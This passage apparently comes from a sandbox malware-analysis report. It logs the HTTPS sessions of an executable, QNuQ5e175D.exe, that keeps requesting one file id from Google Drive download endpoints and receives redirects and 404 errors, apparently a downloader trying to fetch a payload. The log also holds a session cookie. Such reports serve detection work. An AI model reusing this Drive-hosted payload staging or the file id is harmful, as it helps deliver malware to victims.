                                                      41 | 192.168.2.11 | 50021 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:47 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:47 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSHHEp5YFj3HNU3hqZ1s2vIpBX5B2251aM3rioI1an75eyF2MfLVVdNZ0fT78X3ewRjcBJ7XPA
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:47 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-VSNeLRql5daDZf_dYffKag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:47 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eZduHL_WyvufgC3WZzpItQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.11 | 50022 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:48 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:48 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-oOcdgzfFmDD0CAtTko-x3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.11 | 50023 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:49 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:50 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQILz_p_oTbhPoBahKB_UfXzbmKckVELPV23vZTVrk7MPddQrdnwJuqaQdUJr6Y5RJf
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:49 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-7WRZPqyN5fOr8bAbNk44qQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:50 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="09UMuueA0E37X22lmis_2g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      44 | 192.168.2.11 | 50024 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:50 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:51 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mm4KoQmzii08qyH_yTVoww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      45 | 192.168.2.11 | 50025 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:51 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:52 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQyHgAjAxauHLOq6dbMWfXdCljVvh2pk3hRHPiw7ehWZVrDhZa8Pu6O8dyotXL67rK2
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:52 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-nE6Y7UtAuzb2nycRDjQYGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:52 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4u5mCBXE71IT7obuBjDbJA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      46 | 192.168.2.11 | 50026 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:52 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:53 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-m9L1PiQiTHPV5K7-rcvfwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      47 | 192.168.2.11 | 50027 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:54 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:54 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQZpAqKQTmdyyG3Ej1Rs3p1D3qfZ3MW1VStHJTO1DTfIu42Ez8tzTFlGJ-wZbC4hQ78DGXeHg8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:54 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-1ScqGiQUimKOlJ_kxupGWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:54 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T1Dc5zKQslgooPzc2pIOEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      48 | 192.168.2.11 | 50028 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:55 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:55 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-a15GEvAqzmSeNr1bIS3YDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      49 | 192.168.2.11 | 50029 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:56 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:56 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgT3tmaIRFHm1yhh_0CGmJlVxbmGg9hIDyCfNxN2Bo6ZSpJu1Gumg7YZpR8OOIVWciub
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:56 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Mw7qU6iTU6ekF4mlPaJ7nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
